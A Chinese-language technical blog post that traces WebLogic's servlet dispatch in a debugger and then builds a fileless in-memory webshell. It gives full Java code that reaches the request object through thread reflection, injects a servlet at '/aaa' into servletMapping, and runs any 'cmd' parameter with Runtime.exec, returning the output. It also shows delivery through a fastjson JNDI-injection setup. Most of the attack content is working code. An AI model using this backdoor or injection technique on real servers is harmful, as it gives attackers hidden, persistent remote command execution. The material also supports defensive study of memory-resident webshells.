前面一段時間學習Tomcat下注入記憶體馬和spring下的記憶體馬,之後又實現了Resin下的記憶體馬,但Resin下的servlet和filter記憶體馬都要依靠defineClass,這就需要編譯java檔案以及base64編碼操作,覺得還是有點麻煩,Resin下最好用的當然還是listener記憶體馬,直接寫在一個執行的java檔案裡面就可以,方便又舒服。
扯皮完了,其實前面學習的記憶體馬實現都參考了前輩們的文章,所以突發奇想,為什麼不試試在不依賴其它文章的情況下,自己除錯並製作記憶體馬呢,所以開始行動?
1、尋找servlet注入方法
1.1 除錯
在IDEA中準備好Weblogic的環境,再寫個servlet,打個斷點,開始除錯
寫好的servlet類是com.bitterz.servlet.TestServlet,獲取到呼叫鏈如下:
doGet:22, TestServlet (com.bitterz.servlet)
service:731, HttpServlet (javax.servlet.http)
service:844, HttpServlet (javax.servlet.http)
run:280, StubSecurityHelper$ServletServiceAction (weblogic.servlet.internal)
run:254, StubSecurityHelper$ServletServiceAction (weblogic.servlet.internal)
invokeServlet:136, StubSecurityHelper (weblogic.servlet.internal)
execute:346, ServletStubImpl (weblogic.servlet.internal)
execute:243, ServletStubImpl (weblogic.servlet.internal)
wrapRun:3432, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
run:3402, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
doAs:321, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:120, SecurityManager (weblogic.security.service)
run:57, WlsSubjectHandle (weblogic.servlet.provider)
doSecuredExecute:2285, WebAppServletContext (weblogic.servlet.internal)
securedExecute:2201, WebAppServletContext (weblogic.servlet.internal)
execute:2179, WebAppServletContext (weblogic.servlet.internal)
run:1572, ServletRequestImpl (weblogic.servlet.internal)
run:255, ContainerSupportProviderImpl$WlsRequestExecutor (weblogic.servlet.provider)
execute:311, ExecuteThread (weblogic.work)
run:263, ExecuteThread (weblogic.work)
一步一步往下找,看看weblogic是如何根據URL找到對應servlet的,跟著呼叫鏈一直看,可以發現定義的TestServlet其實包裝在ServletStubImpl類中的:
繼續跟著呼叫鏈向下推,在wrapRun:3432, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)中可以看到,前面提到的ServletStubIpml類其實是ServletInvocationAction這個內部類的成員物件,成員名為stub,那就需要看看ServletInvocationAction是如何被建立的,或者其中的stub屬性是不是在呼叫鏈中新增的
繼續向下檢視,會發現ServletInvocationAction這個內部類的例項被命名為action,並一路被當作引數傳遞,直到doSecuredExecute:2285, WebAppServletContext (weblogic.servlet.internal)可以看到action被建立,並且傳入了requestFacade.getServletStub(req)的執行結果,斷點打在這一行,以便跟進到getServletStub方法中。
再次進入除錯模式,並跟進到getServletStub中,可以看到如下程式碼,用除錯模式下的程式碼執行工具執行一下ServletRequestImpl.getOriginalRequest(req)
可以看到返回結果是ServletRequstImpl類的例項,再看一下它的getServletStub方法:
public ServletStubImpl getServletStub() {
return this.sstub;
}
也就是說ServletRequstImpl類的例項物件的sstub成員物件就是ServletStubImpl例項物件(其中包裝了真正被執行的TestServlet物件)。意味著需要看看ServletRequestImpl物件是如何被建立的,或者其sstub屬性是何時新增的,這個物件在呼叫鏈中一直被命名為req,並不斷做為引數傳遞,直到呼叫鏈的run:1572, ServletRequestImpl (weblogic.servlet.internal)這一行
首先this代表的就是ServletRequestImpl物件,然後標記處1,通過this.context.getIndexServletStub方法獲取了一個ServletStubImple物件,再看標記2處通過setServletStub方法設定了屬性。
分別看看兩處呼叫的方法,先跟進標記2處的程式碼,如下
void setServletStub(ServletStubImpl stub) {
this.sstub = stub;
}
// this代表ServletRequestImpl物件
破案了!ServletRequestImpl中的sstub屬性是在這裡設定的。現在就需要看看傳入的stub引數,也就是上圖中的servletStub是如何得到的,所以跟進一下上圖中標記1處的getIndexServletStub方法,這裡其實又一個坑,要除錯跟進getIndexServletStub方法,必須重新打斷點,並且重啟weblogic訪問預設頁面,以為this.checkIndexFile只有在這時才為true。
由於getIndexServletStub方法的程式碼比較長,所以簡化如下
ServletStubImpl getIndexServletStub(String URI, ServletRequestImpl req, ServletRequest wrapper) {
String indexURI = this.findIndexFile(URI);
if (indexURI == null) {
// 由於uri為null,所以返回null
return null;
}
else if (xxx) {
....
// 一長串的判斷之後返回null
return null;}
else {
req.initFromRequestURI(this.prependContextPath(indexURI));
ServletStubImpl servletStub = this.resolveDirectRequest(req);
if (servletStub.getClassName().equals("weblogic.servlet.proxy.HttpProxyServlet") || servletStub.getClassName().equals("weblogic.servlet.proxy.HttpClusterServlet")) {
req.initFromRequestURI(this.prependContextPath(URI));
servletStub = this.resolveDirectRequest(req);
}
return servletStub;
}
}
if和else if中放回值都是null,所以不用看,重點看else下面的程式碼塊。servletStub的獲取程式碼為ServletStubImpl servletStub = this.resolveDirectRequest(req),因此跟進resolveDirectRequest方法,其程式碼如下
可以看出來,返回值sstub是從URLMatchHelper中獲取的,所以需要進一步跟進this.resolveRequest方法,程式碼較長,不方便截圖,簡化如下:
private URLMatchHelper resolveRequest(String relUri) {
if (DEBUG_URL_RES.isDebugEnabled()) {
xxxxx
}
URLMatchHelper umh = (URLMatchHelper)this.servletMapping.get(relUri);
if (umh == null) {
xxxxx
}
if (umh == null) {
xxxxx
}
return umh;
}
this為WebAppServletContext,即weblogic實現的servletContext,重點程式碼在於this.servletMapping.get(relUri),通過uri從servletMapping中匹配到合適的servlet,處理瀏覽器的請求。至此servlet在weblogic中的呼叫鏈就理順了,其根本在於,需要在servletContext的servletMapping中有於uri相匹配的servlet,當然這裡實際上是servlet的多層包裝,包裝順序如下。
URLMatchHelper urlMatchHelper = servletcontext.servletMapping.get(uri);
ServletStubIpml servletStub = urlMatchHelper.getServletStub();
ServletRequestImple.sstub = servletStub;
ServletInvocationAction.stub = servletStub;
//呼叫順序如下
ServletInvocationAction.stub.HttpServlet->service->doGet
這裡除錯完後,跟著呼叫鏈繼續向下推,發現訪問/test,在ServletRequestImpl物件建立時,ServletStub就已經建立好了,具體原因沒有搞清除
1.2 servletMapping新增servlet
除錯完畢後,可以直到,只需要在servletMapping中新增URI和對應的URLMatchHelper物件即可,這裡通過反射即可實現。
// 建立servlet
HttpServlet httpServlet = new HttpServlet() {
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String cmd = req.getParameter("cmd");
if (cmd != null){java.lang.Runtime.getRuntime().exec(cmd);}
return;
}
};
String URI = "/aaa";
// 獲取servletContext
weblogic.servlet.internal.WebAppServletContext servletContext = (WebAppServletContext) req.getServletContext();
try {
// 獲取servletMapping
Method getServletMapping = servletContext.getClass().getDeclaredMethod("getServletMapping");
getServletMapping.setAccessible(true);
ServletMapping mappings = (ServletMapping) getServletMapping.invoke(servletContext);
// 使用ServletStub包裝HttpServlet
Constructor<?> ServletStubImplConstructor = Class.forName("weblogic.servlet.internal.ServletStubImpl").getDeclaredConstructor(String.class, Servlet.class, WebAppServletContext.class);
ServletStubImplConstructor.setAccessible(true);
ServletStubImpl servletStub = (ServletStubImpl) ServletStubImplConstructor.newInstance(URI, httpServlet, servletContext);
// 使用URLMathchHelper包裝ServletStub
Constructor<?> URLMatchHelperConstructor = Class.forName("weblogic.servlet.internal.URLMatchHelper").getDeclaredConstructor(String.class, ServletStubImpl.class);
URLMatchHelperConstructor.setAccessible(true);
Object umh = URLMatchHelperConstructor.newInstance(URI, servletStub);
// 新增到ServletMapping中,即代表注入servlet記憶體馬成功
if (mappings.get(URI) == null){
mappings.put(URI, umh);
}
} catch (NoSuchMethodException | InvocationTargetException | IllegalAccessException | ClassNotFoundException | InstantiationException e) {
e.printStackTrace();
}
注入成功:
2、獲取request
2.1 從當前執行緒尋找資訊
前面的工作已經顯示,注入servlet成功了,但注入的基石在於已經擁有了HttpServletRequest物件,通過這個物件獲取servletContext,在進一步在servletMapping中新增記憶體馬。
那重點回到了如何獲取request物件,如果能夠向伺服器寫入或者上傳一個jsp檔案,那當然不需要自己想辦法獲取request物件,因為jsp檔案被中介軟體編譯為java檔案時,會自動新增request等物件。在反序列化或者jndi注入等條件下,只能手動獲取request,從以往在tomcat中獲取request的經驗,當前執行緒中有可能儲存著request物件,在剛剛除錯的呼叫鏈中,直接拉到最下面幾個點,看到如下內容
可見從ExecuteThread中,可以一步一步獲取request物件,進而獲取servletContext,那麼ExecuteThread怎麼獲取呢,這個物件實際上就是當前執行緒!
顯然先用Thread.currentThread()方法獲取當前執行緒吼,再通過幾次反射就就可以獲取request物件了,程式碼如下
// 獲取當前執行緒
Thread threadLocal = Thread.currentThread();
// 獲取workEntry即WlsRequestExecutor這個內部類
Field workEntry = threadLocal.getClass().getDeclaredField("workEntry");
workEntry.setAccessible(true);
weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor wlsRequestExecutor = (ContainerSupportProviderImpl.WlsRequestExecutor) workEntry.get(threadLocal);
// 獲取connectionHandler屬性
Field field = wlsRequestExecutor.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
weblogic.servlet.internal.HttpConnectionHandler connectionHandler = (HttpConnectionHandler) field.get(wlsRequestExecutor);
// 獲取request
ServletRequestImpl servletRequest = connectionHandler.getServletRequest();
// 獲取servlet
weblogic.servlet.internal.WebAppServletContext servletContext = (WebAppServletContext) servletRequest.getServletContext();
到這一步,再跟前面注入servletMapping的程式碼合併在一起,就可以在能夠執行java程式碼的情況下,注入weblogic的servlet了,下面來個示例
2.2 JNDI注入到記憶體馬注入
環境:
- weblogic 12.1.3.0.0
- fastjson 1.2.24
- java 1.8u40
後端servlet程式碼
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
System.getProperties().setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
System.getProperties().setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
JSON.parseObject(req.getParameter("json"));
}
jndi注入端程式碼,由於用到了weblogic相關的包,編譯時要不用maven依賴,要不用IDEA新增weblogic的包
import weblogic.servlet.internal.HttpConnectionHandler;
import weblogic.servlet.internal.ServletRequestImpl;
import weblogic.servlet.internal.ServletStubImpl;
import weblogic.servlet.internal.WebAppServletContext;
import weblogic.servlet.provider.ContainerSupportProviderImpl;
import weblogic.servlet.utils.ServletMapping;;
import javax.servlet.Servlet;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
public class InjectWeblogicServlet extends HttpServlet {
private final String URI = "/aaa";
private final String PWD = "cmd";
public InjectWeblogicServlet(){
HttpServlet httpServlet = new InjectWeblogicServlet("xxx");
try {
// 獲取當前執行緒
Thread threadLocal = Thread.currentThread();
// 獲取workEntry即WlsRequestExecutor這個內部類
Field workEntry = threadLocal.getClass().getDeclaredField("workEntry");
workEntry.setAccessible(true);
weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor wlsRequestExecutor = (ContainerSupportProviderImpl.WlsRequestExecutor) workEntry.get(threadLocal);
// 獲取connectionHandler屬性
Field field = wlsRequestExecutor.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
weblogic.servlet.internal.HttpConnectionHandler connectionHandler = (HttpConnectionHandler) field.get(wlsRequestExecutor);
// 獲取request
ServletRequestImpl servletRequest = connectionHandler.getServletRequest();
// 獲取servlet
weblogic.servlet.internal.WebAppServletContext servletContext = (WebAppServletContext) servletRequest.getServletContext();
// 獲取servletMapping
Method getServletMapping = servletContext.getClass().getDeclaredMethod("getServletMapping");
getServletMapping.setAccessible(true);
ServletMapping mappings = (ServletMapping) getServletMapping.invoke(servletContext);
// 建立ServletStub
Constructor<?> ServletStubImplConstructor = Class.forName("weblogic.servlet.internal.ServletStubImpl").getDeclaredConstructor(String.class, Servlet.class, WebAppServletContext.class);
ServletStubImplConstructor.setAccessible(true);
ServletStubImpl servletStub = (ServletStubImpl) ServletStubImplConstructor.newInstance(this.URI, httpServlet, servletContext);
// 建立
Constructor<?> URLMatchHelperConstructor = Class.forName("weblogic.servlet.internal.URLMatchHelper").getDeclaredConstructor(String.class, ServletStubImpl.class);
URLMatchHelperConstructor.setAccessible(true);
Object umh = URLMatchHelperConstructor.newInstance(this.URI, servletStub);
if (mappings.get(this.URI) == null){
mappings.put(this.URI, umh);
}
} catch (NoSuchMethodException | InvocationTargetException | IllegalAccessException | ClassNotFoundException | InstantiationException | NoSuchFieldException e) {
e.printStackTrace();
}
}
public InjectWeblogicServlet(String aaa){}
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String pwd = req.getParameter(this.PWD);
if (pwd != null){
Process process = Runtime.getRuntime().exec(pwd);
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(process.getInputStream(), "GBK"));
String a;
PrintWriter out = resp.getWriter();
while ((a=bufferedReader.readLine()) != null){
out.write(a);
}
out.flush();
out.close();
process.destroy();
}
}
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
this.doGet(req, resp);
}
}
最後來個實際效果圖
已經新增成功了,訪問注入的url再執行一下命令cmd /c whoami
3、關於filter和listener
filter的新增主要依靠servletContext.filterManager.registerFilter方法,其實看一下filterManager中的getFilterChain函式就知道weblogic中是如何儲存和管理filter的。
listener直接用servletContext.addListener即可,網上的教程很多,除錯過了,原始碼也看過了,就不重複造輪子了。